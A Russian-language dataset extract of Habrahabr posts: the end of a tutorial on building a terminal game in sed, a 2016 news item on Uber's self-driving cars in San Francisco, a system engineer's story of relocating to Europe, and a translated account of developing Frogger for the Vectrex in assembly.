(while true
do
read -s -n 1 key
echo $key
[[ $key == "q" ]] && pkill -P $$
done ) | $SED -u -e '/t/d' > gravity-fifo
Немного пояснений:
pkill — хороший способ убить тактовый генератор и sleep.
А если вам непонятно, зачем нужен этот sleep, то можете проверить без него: с первым же echo pipe закроется и sed поймает EOF. Попутно мы запрещаем пользователю писать тактирующий символ — мы тут байк водим, а не временем управляем. Проблема третья: физика
У нас есть тактирующий символ, который вызывается через константные промежутки времени. Именно в обработчике этого символа можно прописать всю физику игры. Тут не могу дать общих советом, вся физика — это набор регулярок, которые проверяют всё, что проверяется. Проблема четвёртая: пост-обработка
Сразу после того, как мы перешли к метке end и сохранили изменения в hold space, мы можем приступать к наложению эффектов. Ранее я упоминал, что я использую четыре типа дорог. К этому я пришёл методом проб и ошибок. В первых версиях дороги были одного типа: R, а на этапе пост-обработки я пытался написать регулярки, которые бы делали подъем/спуск в зависимости от взаимного расположения дорог.
Идея была отвергнута: алгоритм постоянно сбоил, проще прописать тип дорог.
Вооружаемся таблицей ANSI Escape-последовательностей , я ещё дополнительно воспользовался таблицей Unicode и получилось… s/A/^[[107;38;5;82m█^[[0m/g
s/D/^[[107;38;5;82m▚^[[0m/g
s/P/^[[107;38;5;82m▀^[[0m/g
s/U/^[[107;38;5;82m▞^[[0m/g
Подводные камни есть и здесь: при использовании юникода pattern поиска не должен содержать точное количество символов. Unicode-символы распознаются как два символа и логика такой регулярки ломается. Проблема пятая: маленькое пространство
На экран у нас влезает не так уж много символов, а карту хотелось бы сделать больше. Здесь на помощь приходит Scroll Buffer. Это такое место, невидимое для пользователя, которое будет хранить в себе кусочек продолжения карты. Для комфортного скроллинга стоит пронумеровать строчки, а в самом конце добавить строку, которая нумерует зону, например, z1.
Алгоритм работы: Если любая часть игрока ближе, чем на N символов к правому краю карты, переходим к следующему пункту
Удаляем второй символ карты (первый у нас — рамочка)
К концу каждой строки, перед цифрой добавляем #
Если у нас набралось ровно M символов #, то выполняем следующий пункт, иначе — пропускаем
Проверяем номер текущей зоны и заменяем все # на соответствующую данной зоне карту, меняем имя зоны на имя следующей зоны
Переходим к метке end
На этапе пост-процессинга обрезаем видимую часть так, чтобы символы # никогда не попадали в видимую область, а так же удаляем вспомогательные данные, например, номер зоны.
Ура! Теперь у нас есть базовые знания, как создать игру на sed. Зачем? Потому что можем. P.S. Задание любезно предоставлено Жмылёвым С.А. Надеюсь, следующие поколения примут часть моего опыта и сделают что-нибудь ещё более замечательное. х) | https://habrahabr.ru/post/317638/ |
habrahabr | Uber запустил беспилотные атомобили в San Francisco | ['новости', 'новости технологий', 'беспилотные автомобили', 'uber', 'сан-франциско', 'калифорния'] | Сегодня, 14 декабря 2016 года, компания Uber официально запустила беспилотные автомобили на маршруты в Сан-Франциско.
Отличная новость для любителей фантастики и фанатов прогресса! :)... | Сегодня, 14 декабря 2016 года, компания Uber официально запустила беспилотные автомобили на маршруты в Сан-Франциско.
Отличная новость для любителей фантастики и фанатов прогресса! :)
После тестирования беспилотных автомобилей в Питсбурге в течение 3 месяцев, компания Uber выпустила беспилотники на улицы Сан-Франциско.
От себя добавлю, что я эти машины видел на улицах Сан-Франциско в тестовом режиме около месяца назад.
Некоторые факты о новом сервисе: Как вызвать беспилотный автомобиль? Достаточно просто открыть приложение Uber и вызвать UberX. Если рядом находится робо-машина, она приедет на вызов как и обычный водитель, при этом в приложении появится уведомление о том, какой тип машины едет. Если хочется прокатиться по старинке с водителем, достаточно будет отменить заказ беспилотника и приложение автоматически назначит заказ обычному водителю.
Кто сидит на водительском кресле? В машине находится опытный оператор для соблюдения закона о передвижении беспилотных автомобилей и для обеспечения комфортной поездки. Да и поговорить всяко приятнее с человеком, чем с роботом!
Сколько человек может воспользоваться беспилотником за одну поездку? Максимум три пассажира.
Можно ли изменить пункт назначения? Как только пассажир сел в машину, изменить пункт назначения нельзя. То есть вариант «Остановите за углом, пожалуйста» здесь не уместен.
Есть ли в машине камеры? Да, в машине установлены камеры для того, чтобы оценить поездку и впечатления пассажиров, а также в целях безопасности.
Сколько же это стоит? Стоимость поездки на беспилотном автомобиле такая же, как и стоимость поездки на обычном UberX.
Прогресс движется вперёд! Приятно осозновать, что то, что раньше считалось фантастикой, теперь работает в качестве такси. Ещё немного и Шварцнегер сможет прокатиться на такси с водителем роботом в реальности, а не в кино | https://geektimes.ru/post/283714/ |
habrahabr | Очередная история про миграцию в ЕС | ['иммиграция'] |
Приветствую, дорогой читатель. В последнее время все чаще наблюдаю на Хабре истории об успешной миграции в ЕС (и даже одну в Россию). Раз такой тренд, хотелось бы поведать тебе свою историю. Я... |
Приветствую, дорогой читатель. В последнее время все чаще наблюдаю на Хабре истории об успешной миграции в ЕС (и даже одну в Россию). Раз такой тренд, хотелось бы поведать тебе свою историю. Я постараюсь опустить все эмоциональные составляющие, напротив — постараюсь дать максимально полезную информацию, которая возможно пригодится.
Прежде чем идти под кат, две ремарки: Эта история про системного инженера. Я не уверен, что разработчику будет полезно.
Если тебе надоели истории про карьеру, то не трать свое время, на Хабре есть более интересные посты.
Пусть мы с тобой и не знакомы, мой дорогой читатель, но мне приятно, что тебе интересен мой опыт.
Я опущу детали своего возраста, подробности высшего образования и карьеры в российских компаниях — нет смысла разжевывать все подряд.
Вкратце: В ИТ индустрии с 2010 года, начинал стажером в ИТ поддержке.
Прошел официальное обучение RedHat 6, Oracle 11.2 и MS SQL Server 2008R2. Все остальные технологии и системы освоены самостоятельно.
Работал в классическом ITIL и в Agile/DevOps окружении.
Также оставлю за скобками причины поиска новой работы. Все прекрасно понимают, что такое кризис в РФ в наши дни, да и если б не моя жена, я бы и не рискнул даже.
Теперь к тому, что я использовал для поиска работы. Где искать monster.com , indeed.com , linkedin.com , glassdoor.com и даже hh.ru одни из самых популярных сайтов по поиску работы за рубежом.
Первым делом я перевел свою резюме на английский и выложил его на Монстра. Как ни странно, приглашения на интервью посыпались на следующий день. Посмотрев время получения писем (все они приходили начиная с 7-8 часов вечера по Москве) я понял, что более активные рекрутеры в основном из западного полушария.
После краткого прочтения и быстрой переписки стало ясно следующее: Большинство рекрутеров отправляют письма одновременно большому количеству соискателей.
Это объясняет то, что высока вероятность получить приглашение на интервью на позицию, требования к которой заведомо выше твоих возможностей.
Большая часть приглашений были на временные контрактные позиции (полгода, год)
Компании не оказывают помощи по переезду и получении визы.
Стандартные проблемы не понимания разницы между специальностью и культурой (скажу честно, меня корежит от названия “DevOps инженер”) отнюдь не чужды западному работодателю.
Получив несколько приглашений на интервью на должность DevOps или системного инженера, где в требованиях указывалось от 10 лет опыта работы (у меня на тот момент было 5), я долго недоумевал, после чего проконсультировался с приятелем, который имел опыт найма в западные компании. Оказывается, работодатель изначально ставит максимально высокую планку требований и если не преуспевает в поиске нужного кандидата, то постепенно спускается вниз по иерархии опыта.
Тем не менее, я не согласился ни на одно интервью по простой причине — ни один из потенциальных работодателей не готов был оплатить визу, перелет и “подъемные”. Копить огромную, с учетом девальвации, сумму денег, чтобы отправиться в сомнительное путешествие, где не факт что дело выгорит… Неоправданный для меня риск. Впрочем, рисковым и, главное, ОЧЕНЬ опытным специалистам с официальными сертификатами я бы предложил попробовать. Зарплаты на Senior уровень довольно высокие.
Идеальным для себя плацдармом для поисков я посчитал stackoverflow.com/jobs . Некоторая часть работодателей предлагает визовую поддержку и обеспечивает релокацию (и их очень легко можно отфильтровать). Выложив свое резюме туда, начал рассылать отклики почти во все конторы, офисы которых располагались в Англии, Франции и Нидерландах. Большая часть ответила отказом, ссылаясь на недостаток опыта по той или иной технологии, одна контора пригласила на интервью, но зарплата была слишком мала для жизни в Лондоне (благо я был там в командировке 2 недели и имею определенный инсайт на стоимость жизни). Наконец раздался звонок с голландского номера. Интервью. С рекрутером
Интервьюер сообщил, что прочитал мой отклик и хочет узнать подробнее про мой опыт. Были рядовые вопросы про образование (на кого учился, степень, про что диплом и какой средний балл), опыт работы (что за компания, чем занимался, какие проекты), почему ушел с предыдущей работы, почему сейчас ищу работу, сколько хочу денег и т.д. Получив все ответы, рекрутер сообщил, что передаст все записи нанимающему менеджеру и в скором времени даст обратную связь и, возможно, назначит интервью с нанимающим менеджером. Я был удивлен (а как же технари?), но на следующий день пришло письмо от рекрутера, где он предлагал даты на первое техническое интервью с двумя инженерами фирмы. Он уточнил, что это ознакомительное техноинтервью, в котором не будет насилия, лишь любопытство (какие конкретно технологии и для чего применял). Ну ок. Изучив отзывы и зарплаты на glassdoor, освежив знания по Ansible и приготовился к следующей встрече. Первое техническое
Интервью было по скайпу, двое инженеров сидели напротив меня, представились и начали распрашивать про проекты. Интервью было абсолютно несложным и представляло собой следующий формат — инженер смотрит в резюме и говорит: “Я вижу, что у тебя есть опыт в Ansible. Что ты им делал? А какие возможности Oracle ты использовал?”. Никаких вопросов в стиле “как пропатчить KDE2 под FreeBSD” или “что происходит, когда пользователь открывает браузер и вбивает в поиск foo.bar”. Уже неплохо. После ребята спросили, какие к ним есть вопросы. Я спросил с каким технологиями они работают, какие основные проблемы в работе между командами, сколько Scrum команд, сколько человек в команде. На этом ребята откланялись, им все нравится, счастливо и пока. Позже в скайп постучался рекрутер и сообщил, что первый этап пройден и дальнейшие шаги надо ждать в почте. Второе техническое.
Через неделю пришло второе письмо от рекрутера. У меня over skill (я откликнулся на системного инженера) и мне предлагают попробовать свои силы в позиции ведущего инженера по Linux. Я согласился и мы договорились о втором техническом интервью. Оно обещало быть сложнее и у меня было 4 дня, чтобы основательно подготовиться. За первые дня я быстренько пробежался по конспектам своих курсов, практиковался на LinuxAcademy и искал, какие вопросы в основном задают на техническом интервью. Нашел ТОП 30 вопросов на Linux интервью от ИТ гигантов. (Amazon, Google, Microsoft, RedHat и т.д.) Мама.
Врать не стану, я очень нервничал по поводу этого интервью, потому что близился день X, и у меня не было права на ошибку.
В назначенный день я снова получил звонок в скайп, передо мной сидели 2 уже других инженеров (Из Scrum команды в которую меня предполагалось устроить).
Парни быстро прошлись по моему опыту и один из них спросил, какая часть ИТ вызывает у меня особые затруднения. Я ответил честно: сети (да, да, я тот парень, кто путает L3 и L4 и не может запомнить последовательность TCP handshake) и программирование (из всех языков мне дались только Bash и SQL). Первый вопрос — если мне надо поменять наш текущий RADIUS сервер на что-нибудь open source, как я буду решать эту задачу. Супер.
Я сказал, что первым делом я погуглю. Решение буду выбирать на основе популярности, саппорта, размера и активности сообщества и списка поддерживаемых железок. Затем я создам некоторую лабу со коммутаторами, точками доступа и тд. и протестирую.
Затем последовал вопрос, а что надо сделать на стороне самого RADIUS’а. Я сказал, что надо настроить kerberos. Наверное.
Остальные вопросы были довольно простые: как создать пользователя без использования useradd, у какого процесса PID 1 и как решить проблему chmod -x /usr/bin/chmod
Когда у будущих коллег не осталось вопросов, дальнейший разговор прошел в том же формате, что и в первом собеседовании. Визит в офис, финальное интервью
Через неделю хэдхантер торжественно заявил, что я прошел технический этап, и если мне все еще интересно с ними работать, то я приглашен в офис компании на финальный этап. Компания оплатила перелет, гостиницу и билеты из аэропорта до города. Мне нужно было оплатить только визу. Мне провели экскурсию по офису, назначили встречу с Product Owner’ом и Scrum Master’ом, членами будущей команды, руководителем.
Большим удивлением было, что: Scrum Master был одним из инженеров, с кем я общался.
Нанимающий менеджер сообщил, что его решение не играет большой роли, и что ее главная и единственная задача: следить за тем, чтобы меня все устраивало в плане работы, а также проводить ежегодные performance review
Мистер RADIUS, когда я у него поинтересовался о правильности моего ответа, вообще мой ответ забраковал. На мои слова о том, что я, выходит, не прошел техническое интервью, он ответил тем, что им важнее как человек ведет себя в стрессовой ситуации, когда ему предстоит работать с чем-то, что он видит вообще впервые и что инженерное мышление важнее зазубренной книжки.
Одним из важнейших критериев отбора является так называемый team fit — эмпирическое измерение, насколько ты подходишь конкретной команде. То есть в выборе между профессионалом, который вряд ли подружится с командой и компанейским середнячком — команда выберет второй вариант.
В конце дня мне сделали offer, который я подписал в тот же день. Выводы
Дорогой читатель. Если ты надумаешь однажды сесть на трактор и отправиться в страны западной Европы, то вот тебе мои советы: Смотри вакансии на stackoverflow и HH — там больше шанс найти позиции с релокацией.
Не пренебрегай позициями с релокацией и/или визовой поддержкой. Это изначально говорит о том, что работодатель настроен на найм иноземца
Прежде чем называть цифры внимательное изучи стоимость жизни (стоимость аренды, налоги, еды, транспорт, развлечений и пр.)
Не пытайся казаться умнее, чем ты есть на самом деле. В моем случае мышление было важнее знаний.
Что не отменяет того факта, что больше знаний — больше денег.
Внимательно изучи контракт. Если компания платит за твой переезд, она с высокой долей вероятности попросит тебя задержаться.
Учи английский.
P.S. Если читателям будет интересно, я так же мог бы написать о процессе получения визы и обустройства на новом месте. | https://habrahabr.ru/post/317654/ |
habrahabr | Разработка игры Frogger для компьютера Vectrex | ['vectrex', 'frogger', 'ассемблер', 'assembler', '6809', 'игра', 'ретро-компьютеры', 'перевод'] | Какое-то время назад я переводил рассказ Chris Salomon о его разработке игры Frogger для компьютера Vectrex. Тот рассказ, написанный им в 1998 году, является, на мой взгляд, очень интересным... | Какое-то время назад я переводил рассказ Chris Salomon о его разработке игры Frogger для компьютера Vectrex . Тот рассказ, написанный им в 1998 году, является, на мой взгляд, очень интересным документом, позволяющим проникнуться как духом этой необычной платформы, так и спецификой разработки на ассемблере вообще.
Chris не забросил Vectrex и, сравнительно недавно, довёл до релиза собственный эмулятор Vectrex для Windows (лучший, на данный момент) под названием «Vide». Мне, к слову, приятно, что мои исходники Electric Force помогли ему реализовать приличную поддержку отображения векторных кривых в этом эмуляторе.
И вот, получив в руки такой мощный инструмент, Chris не смог отказать себе в удовольствии вернуться к своему старому Frogger'у, чтобы доработать и улучшить его. Об этом он рассказал в своём блоге .
Таким образом, здесь я публикую две части моего перевода — первую, об оригинальной разработке 1998 года (из файла progger.txt , бродившего вместе с исходниками игры) и вторую — о её продолжении (из блога автора ). Год 1998. Начало
Этот файл содержит заметки, которые могут быть интересны другим разработчикам под Vectrex.
Также он включает «краткую» историю разработки Vectrex Frogger.
Обновление изображения в Vectrex Frogger всегда происходит с частотой 50Гц. Всё отрисовывается не более, чем за 30000 тактов. Ниже приводятся некоторые заметки о техниках оптимизации, позволяющих этого достичь.
На самом деле, я очень город достигнутой скоростью! Вполне возможно, что мои функции для работы со спрайтами — быстрейшие из всех существующих в играх под Vectrex (как минимум, мне нравится так думать...)
Спрайты смотрятся немного странно на настоящем Vectrex — слегка «пятнистыми», однако, к этому можно привыкнуть. Пятнисты они потому, что я использовал для каждого из них фиксированный масштаб (scale) 6. Длинные линии приходилось составлять из более коротких. Vectrex, по своей природе, не всегда выключает луч когда нужно (двумя-тремя тактами позднее, чем нужно). И он всегда включает луч за несколько тактов перед началом рисования…
Это приводит к яркой точке (можно было бы написать новые функции для рисования векторов, не использующие таймер и вычисляющие время иначе, более точно, однако кому захочется этим заниматься?).
Vectrex Frogger, среди прочего, должен был служить хорошо документированной программой для обучения программированию на этом компьютере. Мне кажется, этого мне сделать не удалось.
Из-за гигантского количество векторов, которые должны были отрисовываться в крохотные промежутки времени, необходимо было оптимизировать каждый такт. Из-за этих оптимизаций, как мне кажется, программа перестала быть хорошо читаемой. В основном цикле остался вызов единственной функции BIOS (опрос состояния цифрового джойстика).
Все остальные вызовы были последовательно удалены и заменены оптимизированными (для конкретных ситуаций) макросами или подпрограммами.
Во всё это чрезвычайно трудно вникнуть, если только не вы сами это писали.
Одна из применённых техник оптимизации:
Объяснение, как нарисовать вектор.
…
Так или иначе, чтобы переместить луч к нужной позиции, вы задаёте его скорость, направление и время, в течении которого эта скорость применяется. Затем ждёте, когда это время истечёт.
Время — это масштаб, который вы задали. Если устанавливаете масштаб $90, это значение должно быть записано в таймер 1 (VIA_t1_cnt_lo. Прим. пер.) и затем, в «бесполезном» цикле, ожидается, когда оно истечёт.
Что я предпринял, так это сделал этот цикл полезным. Существенная часть вычисления делается в Vectrex Frogger как раз в это, обычно бесполезное, время.
Я использовал этот подход, преимущественно, при перемещении луча. Большой плюс здесь в том, что как бы много я не делал в это время, это ни на что не влияет! Единственное, за чем вы должны следить, это не занимать времени МЕНЬШЕ, чем значение таймера. Впрочем, это легко решается тем же циклом опроса таймера (VIA_int_flags — прим. пер.) в конце ваших вычислений.
Тот же подход можно использовать и во время рисования вектора. Рисование и перемещение вектора — одно и то же. Единственная разница — «паттерн», записываемый в сдвиговый регистр. Для перемещения туда записывается 0, для рисования — $FF (если, конечно, хотите нарисовать сплошную линию).
Однако, при рисовании нужно удостовериться, что вы выключили луч (записью 0 в сдвиговый регистр) вовремя. В противном случае получите в конце вектора яркую точку!
Ещё одним способом оптимизации было написание специальной функции (макроса) для отрисовки списка векторов. Каждый выигранный там такт был на вес золота.
Допустим, вывожу 30 спрайтов и каждый спрайт состоит из, скажем, 20 векторов. Это составляет около 600 векторов. Если я напишу оптимизированную функцию, которая сэкономит около 10 тактов на вектор, мы одним ударом выиграем около 6000 тактов!!!
И еще — разворачивание циклов! На самом деле, я использовал этот подход постоянно с моими программами на Watcom C, однако никогда не думал, что буду реализовывать такое сам. Сегодня я попытал счастья, разворачивая функцию отрисовки списка векторов. Удача! Я выиграл более 10 тактов на КАЖДЫЙ вектор. Это дало мне еще одно ускорение в почти 3000 тактов! Я раскрутил лишь один цикл — главный цикл рисования спрайта.
Другой важный цикл рисования спрайтов (для спрайтов домов) оставался нетронутым, хотя, если бы я оптимизировал таким образом все циклы, я бы вероятно выиграл от 500 до 1000 тактов. Но здесь есть и отрицательная сторона — это делает программу значительно длиннее. Ну, мы не можем получить всё, не так ли?
Ещё одна техника не использована, поскольку в ней, кажется, больше нет нужды:
Реализация нового типа векторного списка, который включал бы информацию о масштабе, может дать выигрыш в несколько циклов, так как многие длинные линии теперь рисовались бы короткими. Это может снизить потери, если список будет включать вторую переменную для длины. Кстати:
Ассемблер который я использовал — ОЧЕНЬ хорош. Для оптимизации обязательно смотрите в создаваемый им *.lst файл. В нём не только код, но и количество тактов для каждой инструкции и их длина… Правда, очень здорово )
Немного про определения объектов (специфично для подпрограмм, использованных в Vectrex Frogger):
Все изображаемые в игре «предметы» теперь называются объектами. Эти объекты состоят из двух разных сущностей — списка векторов и определения структуры объекта. Список векторов — обычный для Vectrex. Сначала идёт количество векторов (минус 1), затем относительные координаты векторов (смещения).
Для облегчения фиксации столкновений, все эти списки векторов должны начинаться с крайней левой точки. В ранней версии подпрограммы они должны были быть обязательно замкнутыми, однако больше этого не требуется.
Ниже приведён пример структуры объекта (взят из Vectrex Frogger): otter1a_object:
DB 0 ; скорость + направление
DW otter1a_sprite ; определение графики
DB 0 ; длина в SCALE_FACTOR_GAME
DB 5 ; задержка для анимации
DW otter1b_object ; указатель на следующий анимированный объект
DB -4 ; смещения y в 'SCALE_IN_HOME', поскольку это объект "дом"
DB 0 ; смещения x в 'SCALE_IN_HOME', поскольку это объект "дом"
DB $60 ; яркость
DB 0 ; специальный флаг
Спрайты отрисовываются с фиксированным масштабом 6 (это может измениться в будущих версиях — я размышляю насчёт нового списка векторов, который будет включать информацию о масштабе).
Из-за чрезвычайно оптимизированных подпрограмм рисования это не может (и не должно) быть изменено. Фактически, подпрограммы оптимизированы настолько, что они больше не рисуют в точности то, что нужно.
Существуют две проблемы: Последний вектор в списке обрезается на 2-4 такта раньше необходимого.
Между объектами в списке объектов (пока ещё не упоминавшемся) мы всегда обнуляем луч (речь об обнулении интеграторов и установке луча в центр вызовом Reset0Ref — прим. пер.)
Это обнуление делается не на 100% корректно (только на 98% или типа того )
В действительности, подпрограмма слегка быстровата. Лучу не хватает времени, чтобы достичь нуля (это с учётом того факта, что я уже замедлил подпрограмму на 4 или 5 циклов, однако этого недостаточно...), что приводит к чуть заметной неточности в позиционировании объектов.
Замечания по эмулятору:
Vectrex Frogger нормально работает на эмуляторе (тут речь про DVE — прим. пер.), однако :
Оптимизация делалась с использованием настоящего Vectrex, эмулятор пока не может справиться с некоторыми мелочами, которые необходимы для проверки кода. Они работают нормально такими, какие они сейчас. Но если вы будете сами что-то оптимизировать, нужен Vectrex — вы расстроитесь, если на реальном железе всё заработает совершенно иначе. Особенно это касается точного соблюдения временных интервалов.
Эмулятор делает многие вещи немедленно, в то время как настоящему Vectrex-у требуется на это время. К примеру, это верно для обнуления луча и доступа к любому регистру VIA…
Существует много интересных экспоненциальных функций для просмотра на экране вашего Vectrex-a )
(такие как зарядка и разрядка конденсаторов интеграторов). История
Моя история программирования под Vectrex и, в особенности, Vectrex Frogger.
Впервые я заинтересовался Vectrex в 1983, но денег чтобы его купить у меня не было. В 1996 я подумал, что могу проверить свои способности программиста и написать эмулятор Vectrex. Однако, в том же направлении думал и Кейт Уилкинс. Он выложил свои исходники в тот момент, когда у меня были лишь первые наброски моего эмулятора, так что я забросил их и стал смотреть в исходники Кейта.
За следующие 2 года я улучшил его эмулятор в некоторых аспектах и думаю, что я теперь, типа, несу за него ответственность.
Несколько месяцев назад я подумал, что было бы прикольно превратить DVE (упомянутый эмулятор — прим.пер.) в среду разработки для Vectrex, поскольку мне казалось, что эмуляция теперь достаточно хороша для этого (хотя теперь я знаю, что это не так и, возможно, никогда не будет так, если только вскоре не выпустят Pentium III 500МГц, причём по приемлимой цене).
Я ещё раз осмотрел Internet на предмет всего, что касается программирования Vectrex чтобы разобраться, что понадобилось бы программисту.
Найдено было довольно мало. Немного дизассемблированных образов игр, впрочем, хорошо документированных. Кое-что от Клэя и Джона, хотя не сказал бы, что хорошо документированное (особенно твоё, Джон). «Настоящей» информации по программированию не было. Так что я решил, что должен разбираться сам.
Как-то, в один из дней, я сел и попытался написать мою первую игру для Vectrex — VPONG. Она была написана примерно за 4-5 часов и для новичка работала на удивление хорошо, хотя здесь не имеется ввиду достижения в плане играбельности (там один игрок и играть довольно сложно). Однако всё, что нужно, там было — звук, вектора, текст, джойстик, кнопки, масштабирование, фейдинг и т.д.
На следующей неделе мне в голову пришла идея Vectrex Frogger, откуда и родился первый прототип спрайтового движка. Тогда я сделал «открытие», что масштабирование большими значениями — плохая идея.
Я размышлял над скоростью моей программы и целью было одно обновление (здесь и далее речь идёт о полной отрисовке одного условного «кадра» — до очередного вызова Wait_Recal. Прим.пер.) как минимум за 70000 тактов, иначе бы я бросил это дело. Я полагал, что если это будет происходить за 70000 тактов, частота обновления будет больше 20 Гц — т.е. с приемлимым мерцанием.
На тот момент у меня уже был Vectrex, однако он ещё не был подключен к параллельному порту моего компьютера (и хорошо, так как если бы я тогда разобрался с соединением, то забросил бы всю затею довольно быстро).
Экспериментируя со значениям масштаба, я узнал, что большие значения приводят к тому, что обновления длятся более 100000 тактов. Дальнейшие проверки выявили, что малые значения работают отлично и я пришёл к, примерно, 50000 тактам (кстати то, что я отвечал за эмулятор, иногда очень помогало. Я написал функцию эмулятора для измерения числа тактов — мне достаточно было набрать 'rc' и она выдавала такты требуемые на обновление )
(теперь-то совершенно ясно, что масштаб на самом деле влияет, поскольку это таймер… однако тогда, тоже зная это, я на самом деле не представлял, что это значит).
В любом случае у меня в руках был работающий спрайтовый движок и всякие странные векторные рисунки, двигающиеся по экрану на манер лягушки. Мои подпрограммы работы со спрайтами тогда уже поддерживали анимацию, однако, сделав два или три спрайта, я совсем запарился. Рисовал спрайты карандашом на бумаге и переводил координаты в координаты для Vectrex. Делать такое для кучи спрайтов — полный !$"$"&!"$&=(!!!
К счастью, я нашёл приятеля, ищущего, чем бы заняться и убедил его сделать маленькую программу для рисования векторов, которая был сохраняла координаты таким способом, с которым я бы легко мог работать в своей программе. Джеймс (мой приятель) сделал такую программу, а я занимался основной.
Довольно быстро были скомпонованы подпрограммы работы с джойстиком и определения столкновений.
В первую версию Frogger (начальные уровни) можно было играть через три дня программирования, хотя вы не могли войти в дом и не было реализовано никаких других специальных возможностей.
Повторюсь, я несколько запарился делать спрайты. Над некоторыми подпрограммами я думал даже в автобусе по дороге с работы домой. Подпрограммами, которые я щедро окрестил «подпрограммами морфинга».
У меня была идея, что один список векторов может быть медленно изменён в другой, и что в результате получится классный эффект. Я немного поразмышлял над этим и обнаружил, что в 6809 не было инструкции DIV, а MUL была беззнаковой.
Я написал две таких функции и две (до сих пор существующие) подпрограммы морфинга (setup и do_one_step). Ох, они были очень медленные — за деление и умножение много раз за кадр через самописные подпрограммы пришлось дорого заплатить, скажу я вам. Вскоре я заменил функцию деления оптимизированной версией, которая работала как надо.
До сих пор у меня имелась функция морфинга, которая могла морфить за любое (8 бит) число шагов. Но она всё еще была слишком медленная для практического применения. После многочисленных оптимизаций я пришёл к функции морфинга с фиксированным числом шагов — 16. Это та функция, которая используется во время запуска игры и в некоторых промежуточных эпизодах.
Закончив с этим, я переключился на звук. Меня всегда интересовало, какие ноты были какими, пока наконец я в этом не разобрался (имеется ввиду, относящиеся к BIOS Vectrex-a). Я не могу читать ноты и я кто угодно, но не музыкант.
Поискав в Интернете ноты «The yankee doodle», я не смог ничего найти. Всё кончилось midi файлом. Затем я стал искать midi плейер/редактор. В итоге нашёлся один, который выводил ноты мелодии в читаемой форме. В конце концов, я «написал» музыку yankee doodle для Frogger.
Для меня это было большим подвигом, правда!!!
В начале, я хотел чтобы тему задавал барабан, однако это звучало довольно плохо. В способе, которым мелодия играется сейчас, используются три голоса, со сдвигом октавы в каждом. Звучит по мне так нормально — в любом случае, ошибок я распознать не могу :-(
Теперь настало время добавить пару деталей. Это было то, чего я опасался, поскольку это означало развлечение с уже готовым кодом и внедрением в него новых вещей (конечно, наполненных багами). Новыми деталями были мухи, крокодилы, змеи, девушки, таймер, часы, выдра, плавающие черепашки…
Я запрограммировал их всех с закрытыми глазами, однако мне не понравилось ни минуты этого занятия. Сказать по правде, я это ненавидел. Однако, это были вещи которые я должен был сделать, чтобы Frogger был Frogger'ом. Эти чёртовы игры с идиотскими переменными времени, когда появляются мухи, проверками координат снова и снова, если лягушка близко к голове змеи и т.п.… Терпеть это не мог.
Но, как вы можете видеть, я это сделал. Однако, всё имеет свою цену. Frogger стал медленным — он снова стал близок к тем 70000 тактам.
В то время я как раз получил картридж с ППЗУ для моего Vectrex-a и запустив несколько разных игр, обнаружил, что что медленные игры сильно мерцают :-(. Мне это очень не понравилось. Я пока ещё не мог перенести мой Frogger в Vectrex, поскольку заказанный эмулятор ППЗУ ещё не приехал, но у меня было несколько ППЗУ и я на них посматривал…
В тот момент меня очень беспокоило, как будет выглядеть Frogger на настоящем Vectrex, но я не мог найти никого с программатором.
Тем не менее, я осознал, что Frogger в том виде, как он есть, был слишком медленным, так что я начал подумывать об оптимизации и компромиссах. Первое, что я сделал — удалил с главного экрана подсчёт очков, жизней и индикатор уровня. Можете ли вы поверить, что один вызов этой идиотской функции «print string' занимает более 10000 тактов!?
Далее, я отредактировал все спрайты, урезал их так, чтобы использовалось не больше 20, а только 10-15 векторов, что в результате дало выигрыш порядка 10000 тактов (терпеть не мог редактировать все эти спрайты снова!)
(к слову, черепашка которую вы видите в скроллящемся тексте — предок тех черепашек, которые ползают в самой игре).
После этого я был уверен, что смогу достичь моей цели по таймингам. Этой целью теперь стала отрисовка каждого кадра в пределах 50000 тактов, поскольку все измерения сделанные над доступными мне коммерческими играми означали, что это значение достоверно, а некоторые игры даже выходят за его пределы. (Всё ещё жду эмулятор ППЗУ...)
Так как пока что имелось немного свободного времени, я решил, что хорошо было бы реализовать скроллящийся текст. Имея практически готовый Frogger с десятью полосами движущихся спрайтов, я полагал, что сделать одну полосу движущихся букв не будет слишком сложным. И действительно, после рисования всех букв по 3 или 4 раза (программа рисования векторов имела серьёзный баг) и потратив на это некоторое количество нервов, я с этим разделался.
Однако, теперь возникла новая проблема. У Vectrex так „много“ ОЗУ! (Один килобайт. Прим. пер.). Иметь информацию об уровнях и спрайтах, необходимость хранить много других переменных в ОЗУ, делать морфинг и ещё иметь скроллящийся текст — это был ещё один вызов. Я изменил распределение ячеек ОЗУ и стал использовать некоторые из них дважды и трижды. Это также было сделано, хотя позднее мне пришла мысль, что в то время программирование под Vectrex было ещё лёгким. (Всё ещё жду эмулятор ППЗУ...)
Таким образом, я просто ждал и время шло без каких-либо изменений в коде.
За пару недель я не сделал ничего, поскольку окончательная проверка должна была быть сделана на настоящем Vectrex.…
Наконец он приехал, подключён и… не работает (
Проверил кое-что… Да, работать-то работает, однако единственный ППЗУ картридж, который у меня был, имел адреса только до 8Кб, а Frogger к тому времени уже превысил этот размер, так что я не смог поиграть в мою игру (
(хотя, поиграл почти во все остальные игры, впервые).
Поскольку я сам не разбираюсь в электронике и не знаю, как переделать картридж чтобы он работал с 16Кб (или 32Кб) ППЗУ, я громко воззвал о помощи. Джон услышал мои крики и прислал мне пару ППЗУ картриджей, которые работали отлично (на это ушли ещё две недели).
Возможность иметь доступ к 8Кб для начала была тоже не так уж плоха, так что я смог разбить Frogger на пару частей и проверить их одна за другой. Хотя это не позволяло оценить все возможности игры, для частичной проверки вполне достаточно.
Тут я обнаружил сильный эффект „шатания“ (wobble), который эмулятор воспроизвести не мог. После изучения вопроса я понял, что это было связано с таймингами. Шатание было, по большей части, заметно при запуске. И только когда рисовались „неподвижные“ векторы, анимированные или движущиеся каким-то образом приобретали что-то типа иммунитета к этому (странно?)
Так или иначе, поимев несколько седых волос, я разобрался, что если обновление кадра занимает более 30000 тактов, неподвижные векторы начинают шататься (как минимум, на моём Vectrex-e). Это касалось не только моей игры, а почти всех игр, которые имели неподвижные векторы где-либо и требовали более 30000 тактов на обновление кадра.
Это было верно даже для Minestorm — встроенной в Vectrex игры. Когда игра запускалась, через несколько секунд, когда первые мины появлялись на экране, точки шатались (естественно на моём Vectrex, т.к. я мог проверить только на нём).
Как только вы узнали, как выглядит этот эффект, то начинаете обнаруживать его довольно часто.
Нечего и говорить, что мне, как перфекционисту, это совсем не нравилось.
Другие игры могут шататься сколько им угодно, но не моя игра. И уж точно не на стартовом экране, который вы видите, когда её запускаете.
